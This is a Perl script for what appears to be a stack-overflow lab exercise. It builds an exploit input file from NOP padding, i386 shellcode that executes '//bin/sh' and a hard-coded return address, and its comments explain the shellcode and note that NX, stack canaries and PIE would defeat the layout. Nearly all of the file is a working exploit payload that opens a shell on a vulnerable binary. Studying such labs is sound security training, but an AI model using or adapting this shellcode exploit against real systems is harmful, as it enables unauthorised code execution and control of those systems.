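#!/usr/bin/perl
#
# Builds the input file for a stack-overflow lab exercise (ret2ret variant)
# and writes it to "payload_ret2ret" in the current directory.
#
# Layout of the generated file, in order:
#   232 bytes  NOP padding (0x90)
#    24 bytes  i386 Linux shellcode that executes "//bin/sh"
#    16 bytes  the return address 0x0804846c, repeated four times
#
# Defensive context: this layout depends on the test binary being built
# without the usual hardening. A non-executable stack (NX) keeps the injected
# bytes from running, a stack canary detects the overwrite before the
# function returns, and a position-independent executable (PIE) randomises
# the code address that is hard-coded below.

use strict;
use warnings;

# i386 shellcode; each chunk is annotated with the instruction it encodes.
my $shellcode =
    "\x31\xc0"             . # xorl  %eax, %eax
    "\x50"                 . # pushl %eax              (string terminator)
    "\x68\x6e\x2f\x73\x68" . # pushl $0x68732f6e       ("n/sh")
    "\x68\x2f\x2f\x62\x69" . # pushl $0x69622f2f       ("//bi")
    "\x89\xe3"             . # movl  %esp, %ebx        (path argument)
    "\x99"                 . # cltd                    (zeroes %edx)
    "\x52"                 . # pushl %edx
    "\x53"                 . # pushl %ebx
    "\x89\xe1"             . # movl  %esp, %ecx        (argv array)
    "\xb0\x0b"             . # movb  $0xb, %al         (execve on i386 Linux)
    "\xcd\x80";              # int   $0x80

# This address must match the address of the ret instruction in the test
# binary. It is stored little-endian (0x0804846c) and repeated four times.
# NOTE(review): the value is specific to one build of the test binary;
# recompiling it or enabling PIE changes the address.
my $retaddr = "\x6c\x84\x04\x08" x 4;

# NOP padding placed in front of the shellcode.
my $pad = "\x90" x 232;

# Complete input string for the vulnerable test program.
my $arg = $pad . $shellcode . $retaddr;

# Store the input string in a file. Three-argument open with a lexical
# handle replaces the unchecked two-argument bareword form, and ":raw" keeps
# any I/O layer from translating the bytes; every I/O step is checked so a
# failed or truncated write is reported rather than silently ignored.
my $out_path = 'payload_ret2ret';
open my $out, '>:raw', $out_path
    or die "cannot open $out_path for writing: $!";
print {$out} $arg
    or die "cannot write to $out_path: $!";
close $out
    or die "cannot close $out_path: $!";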